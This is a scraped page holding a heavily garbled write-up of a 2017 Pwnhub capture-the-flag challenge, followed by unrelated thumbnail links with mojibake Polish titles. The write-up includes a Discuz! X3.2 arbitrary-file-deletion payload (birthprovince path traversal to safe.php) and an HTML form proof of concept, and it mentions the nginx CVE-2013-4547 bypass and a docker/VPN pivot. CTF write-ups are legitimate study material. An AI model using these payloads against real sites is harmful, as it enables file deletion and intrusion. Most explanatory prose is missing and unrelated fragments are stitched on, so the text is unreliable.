pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...
9
Pwnhub 2013 C014 2017-10-04 54.223.177.152+80 2017.10.03 17+50+16 Discuz Discuz 2017.10.03 11+24+40 Flag 2017.10.02 15+45+49 Nginx server CVE-2013-4547 + + + VPN + docker + Discuz!X CVE-2013-4547 nginx nmap 22 80 ssh .DS_Store
Transcript of pwnhub...Pwnhub 2013 C014 2017-10-04 µ # ç ; D W 8 Ì Ì S Ì S È Î 54.223.177.15280 E Û...
Pwnhub 2013C014 2017-10-04
54.223.177.152+80
2017.10.03 17+50+16 Discuz Discuz
2017.10.03 11+24+40 Flag
2017.10.02 15+45+49 Nginx server
CVE-2013-4547 + + + VPN + docker + Discuz!X
CVE-2013-4547
nginxnmap 22 80ssh
.DS_Store
1
2
3
4
5
admin/
config/
includes/
pwnhub/
upload /
pwnhub/ 403cve-2013-4547 pwmhub/
.DS_Store
untar.py
return.cfg
123 1.cfg tar 123
docker/etc/crontab
cron_run.sh
1
2cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py
run.py
mail_send.pyVPN
mac L2TP/IPsec PSK …
docker
docker 172.17.x.x ipip 172.17.0.3
index.php
Oh Hacked safe.phpnmap 80 3306 8090
8090 Discuz! X3.2
Discuz!X
Discuz!Xindex.php include safe.phpsafe.php
1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
post
1 birthprovince=../../../../../../../../../../../../usr/share/nginx/html/safe.php&profilesubmit=1&formhash=b8f4701a
formhash hashCentOs nginx /usr/share/nginx/html/
1 http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
poc:
1
2
3
4
5
6
<form action="http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST"
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="b8f4701a"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
safe.php referer
get flag
http://172.17.0.3/index.php passwd=jiajiajiajiajia
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] Ministerstwo ...stowarzyszenie.lowicz.pl/.../03/sprawozdanie-merytoryczne-2014.pdf · Ministerstwo Pracy ] W } o ] Ç l ] ^ }](https://static.fdocument.pub/doc/165x107/5c771c4c09d3f2a94e8b74e4/z-i-v-a-i-v-u-c-c-i-v-i-i-s-o-v-ministerstwo-ministerstwo.jpg)
![t Ç l Ì } u ] } Á µ Ì ] o i Ç Z Á ] Ì w } ] l ] Ì } Á } v ...](https://static.fdocument.pub/doc/165x107/6248c07d039d5f546d1afe69/t-l-u-o-i-z-.jpg)
![Narodowy Instytut } P v ] Ì i ] } Ï Ç l µ µ o ] Ì v P } t ... · Narodowy Instytut t } o v } ] r v µ u Rozwoju ^ } s Ì w Á Obywatelskiego Z } Ì v Á } Ì v ] u Ç } Ç Ì](https://static.fdocument.pub/doc/165x107/5f377aa819e9fc3a086b2c9a/narodowy-instytut-p-v-oe-i-l-o-oe-v-p-t-narodowy-instytut.jpg)
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] } P v ] Ì i ... files v ] } v i Ì Ì } Ì Ì P o v Ç Z Ì s } v l Á } P v µ Ì Ì Ì i P } / u ] ' ] v Ì Á ] l }Funkcja](https://static.fdocument.pub/doc/165x107/5ca6f0cf88c993a22b8b6ca6/z-i-v-a-i-v-u-c-c-i-v-i-i-s-o-v-p-v-i-i-v-v-i.jpg)
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] } P v ] Ì i ... · Strona www 2. Adres siedziby i dane kontaktowe ï X i i ] Á < i } Á Ç u Z i Ì ^ } Á Ç u ð X µ Ì](https://static.fdocument.pub/doc/165x107/602121084dda0c403434a724/z-oe-v-oe-v-u-oe-v-oe-oe-s-o-v-p-v-oe-i-strona-www.jpg)
![New Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] } P v ] Ì i ] } Ï Ç l µ µ o ... · 2017. 8. 31. · Ministerstwo Rodzin, Pracy i Polityki ^ } s Ì v i Z } Ì v Á }](https://static.fdocument.pub/doc/165x107/600a72be7e61c83eef4b39ea/new-z-oe-v-oe-v-u-oe-v-oe-oe-s-o-v-p-v-oe-i-.jpg)
![î ì í ô r l o P À u } Ì P l v Ç Ì o Ç ] · î ì í ô r l o P À u } Ì P l v Ç Ì o Ç ] < l l o D ] o Ì o º v l U Z À v î ì í ô r o ( } P }](https://static.fdocument.pub/doc/165x107/5f0404747e708231d40be85d/-r-l-o-p-u-oe-p-l-v-oe-o-r-l-o-p-u-oe-p.jpg)
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] } P v ] Ì i ...1).pdf · 9. Cele statutowe organizacji ~E o Ï Ç } ] o v } Á ] µ µ } P v ] Ì i ] Podstawowym celem Caritas](https://static.fdocument.pub/doc/165x107/5e72e05c6ae28c23bd380f90/z-oe-v-oe-v-u-oe-v-oe-oe-s-o-v-p-v-oe-i-1pdf.jpg)
![v s Ç D s } } o l ] Z / P Ì Ç l Ì ] ] ] / P Ì Ç l D s } Ì ...](https://static.fdocument.pub/doc/165x107/62a414a9740d3517ea12cb02/v-s-d-s-o-l-z-p-l-p-.jpg)
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] Ministerstwo ...opoka-katowice.org/wp-content/uploads/2016/04/sprawozdanie... · 9. Cele statutowe organizacji ~E o Ï Ç } ]](https://static.fdocument.pub/doc/165x107/5c78ff4209d3f2d2178be53f/z-i-v-a-i-v-u-c-c-i-v-i-i-s-o-v-ministerstwo-opoka-.jpg)
![Z } Ì v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v } ] Ministerstwo ...](https://static.fdocument.pub/doc/165x107/6169c72b11a7b741a34b40fd/z-v-v-u-v-s.jpg)
![Z } Ì v µ } Ì Ì } v Á } Ì v ] u Ç } Ç Ì v Ì Ì ] s o v ... › wp-content › uploads › 2019 › 11 › ... · woj. mazowieckie ± Biblioteka Pedagogiczna w Radomiu; woj.](https://static.fdocument.pub/doc/165x107/5f036a797e708231d40919a4/z-oe-v-oe-oe-v-oe-v-u-oe-v-oe-oe-s-o-v-a-wp-content.jpg)
